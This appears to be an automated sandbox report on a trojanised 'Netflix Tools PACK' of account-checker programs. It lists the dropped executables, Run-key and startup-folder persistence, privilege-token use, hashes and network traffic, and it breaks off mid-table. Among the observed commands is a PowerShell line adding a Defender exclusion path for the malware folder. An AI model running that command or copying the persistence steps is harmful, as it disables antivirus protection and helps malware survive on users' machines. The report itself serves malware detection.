| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
Files
memory/4756-133-0x0000000000E90000-0x0000000000F04000-memory.dmp
memory/4756-134-0x0000000005710000-0x00000000057AC000-memory.dmp
memory/4756-135-0x0000000005D60000-0x0000000006304000-memory.dmp
memory/4756-136-0x0000000005850000-0x00000000058E2000-memory.dmp
memory/4756-137-0x0000000005830000-0x000000000583A000-memory.dmp
memory/4756-138-0x0000000005AA0000-0x0000000005AB0000-memory.dmp
memory/4756-139-0x0000000005A40000-0x0000000005A96000-memory.dmp
memory/1448-140-0x0000000000E60000-0x0000000000E74000-memory.dmp
memory/1448-141-0x00000000057D0000-0x00000000057E0000-memory.dmp
memory/1448-142-0x00000000069C0000-0x0000000006A3E000-memory.dmp
memory/1728-143-0x00000000003C0000-0x00000000004AE000-memory.dmp
memory/1728-145-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1448-146-0x00000000057D0000-0x00000000057E0000-memory.dmp
memory/1564-147-0x0000000004E60000-0x0000000004E96000-memory.dmp
memory/1564-148-0x0000000005660000-0x0000000005C88000-memory.dmp
memory/1728-149-0x0000000005470000-0x0000000005550000-memory.dmp
memory/1564-150-0x0000000005540000-0x0000000005562000-memory.dmp
memory/1564-151-0x0000000005C90000-0x0000000005CF6000-memory.dmp
memory/1564-152-0x0000000005DB0000-0x0000000005E16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sjd3a11b.zxn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1728-162-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-164-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-163-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-165-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-166-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1564-167-0x0000000005020000-0x0000000005030000-memory.dmp
memory/1728-168-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1564-169-0x0000000005020000-0x0000000005030000-memory.dmp
memory/1728-170-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/1728-171-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/1564-172-0x0000000006410000-0x000000000642E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1448-194-0x00000000075E0000-0x0000000007656000-memory.dmp
memory/1448-195-0x00000000075C0000-0x00000000075DE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1728-209-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/4728-211-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1564-212-0x00000000069D0000-0x0000000006A02000-memory.dmp
memory/1564-213-0x000000006F570000-0x000000006F5BC000-memory.dmp
memory/1564-223-0x00000000069B0000-0x00000000069CE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/1564-225-0x0000000007D50000-0x00000000083CA000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4916-229-0x0000000000010000-0x0000000000022000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/1564-227-0x0000000007710000-0x000000000772A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4728-232-0x00000000052F0000-0x0000000005300000-memory.dmp
memory/1564-231-0x0000000005020000-0x0000000005030000-memory.dmp
memory/1564-233-0x000000007F560000-0x000000007F570000-memory.dmp
memory/1564-236-0x0000000007780000-0x000000000778A000-memory.dmp
memory/1564-237-0x0000000007990000-0x0000000007A26000-memory.dmp
memory/1564-238-0x0000000007940000-0x000000000794E000-memory.dmp
memory/1564-239-0x0000000007A50000-0x0000000007A6A000-memory.dmp
memory/1564-240-0x0000000007A30000-0x0000000007A38000-memory.dmp
memory/1728-243-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-244-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-245-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-246-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-247-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-248-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-249-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-250-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/1728-251-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/1728-252-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/1728-253-0x0000000004F00000-0x0000000005000000-memory.dmp
memory/4728-254-0x00000000052F0000-0x0000000005300000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
38s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe"
Network
| Country | Destination | Domain | Proto |
| US | 52.168.117.170:443 | tcp |
Files
memory/5044-133-0x0000000000CD0000-0x0000000000D00000-memory.dmp
memory/5044-134-0x0000000005610000-0x00000000056AC000-memory.dmp
memory/5044-135-0x0000000005CB0000-0x0000000006254000-memory.dmp
memory/5044-136-0x00000000057A0000-0x0000000005832000-memory.dmp
memory/5044-137-0x0000000005730000-0x000000000573A000-memory.dmp
memory/5044-138-0x00000000059A0000-0x00000000059F6000-memory.dmp
memory/5044-139-0x0000000005770000-0x0000000005780000-memory.dmp
memory/2200-140-0x0000000000DB0000-0x0000000000DC4000-memory.dmp
memory/2200-141-0x0000000006C90000-0x0000000006D0E000-memory.dmp
memory/2200-142-0x00000000056B0000-0x00000000056C0000-memory.dmp
memory/2572-143-0x00000000006F0000-0x0000000000716000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
36s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 8.238.22.126:80 | tcp | |
| US | 8.8.8.8:53 | 126.211.247.8.in-addr.arpa | udp |
Files
memory/4596-133-0x00000000009E0000-0x00000000009FA000-memory.dmp
memory/4596-134-0x00000000053D0000-0x000000000546C000-memory.dmp
memory/4596-135-0x0000000005A20000-0x0000000005FC4000-memory.dmp
memory/4596-136-0x0000000005470000-0x0000000005502000-memory.dmp
memory/4596-137-0x00000000053A0000-0x00000000053AA000-memory.dmp
memory/4596-138-0x00000000056C0000-0x0000000005716000-memory.dmp
memory/4596-139-0x00000000056B0000-0x00000000056C0000-memory.dmp
memory/3460-140-0x0000000000390000-0x00000000003A4000-memory.dmp
memory/3460-141-0x0000000006390000-0x000000000640E000-memory.dmp
memory/3460-142-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3432-144-0x0000000000F60000-0x0000000000F7E000-memory.dmp
memory/3432-145-0x00000000017F0000-0x000000000180E000-memory.dmp
memory/4736-146-0x0000000002790000-0x00000000027C6000-memory.dmp
memory/3432-147-0x0000000001850000-0x000000000188E000-memory.dmp
memory/4736-148-0x0000000005220000-0x0000000005848000-memory.dmp
memory/4736-149-0x00000000051F0000-0x0000000005212000-memory.dmp
memory/4736-150-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/4736-151-0x0000000005A60000-0x0000000005AC6000-memory.dmp
memory/3432-152-0x000000001BD90000-0x000000001BDA0000-memory.dmp
memory/3460-153-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/4736-154-0x00000000027D0000-0x00000000027E0000-memory.dmp
memory/4736-155-0x00000000027D0000-0x00000000027E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fm2nucty.1kp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3460-186-0x0000000006C30000-0x0000000006CA6000-memory.dmp
memory/4736-187-0x00000000060C0000-0x00000000060DE000-memory.dmp
memory/3460-188-0x0000000006C10000-0x0000000006C2E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3960-203-0x0000000000350000-0x0000000000362000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3960-207-0x0000000004C80000-0x0000000004C90000-memory.dmp
memory/4736-209-0x00000000027D0000-0x00000000027E0000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4572-208-0x0000000000DC0000-0x0000000000DD2000-memory.dmp
memory/4736-213-0x0000000006680000-0x00000000066B2000-memory.dmp
memory/4736-214-0x000000006FCB0000-0x000000006FCFC000-memory.dmp
memory/4736-224-0x0000000006660000-0x000000000667E000-memory.dmp
memory/4736-225-0x0000000007A10000-0x000000000808A000-memory.dmp
memory/4736-226-0x00000000073C0000-0x00000000073DA000-memory.dmp
memory/4572-227-0x00000000058A0000-0x00000000058B0000-memory.dmp
memory/4736-228-0x000000007F070000-0x000000007F080000-memory.dmp
memory/4736-229-0x0000000007430000-0x000000000743A000-memory.dmp
memory/4736-230-0x0000000007640000-0x00000000076D6000-memory.dmp
memory/4736-231-0x00000000075F0000-0x00000000075FE000-memory.dmp
memory/4736-232-0x0000000007700000-0x000000000771A000-memory.dmp
memory/4736-233-0x00000000076E0000-0x00000000076E8000-memory.dmp
memory/3432-236-0x000000001BD90000-0x000000001BDA0000-memory.dmp
memory/3960-237-0x0000000004C80000-0x0000000004C90000-memory.dmp
memory/4572-238-0x00000000058A0000-0x00000000058B0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
28s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
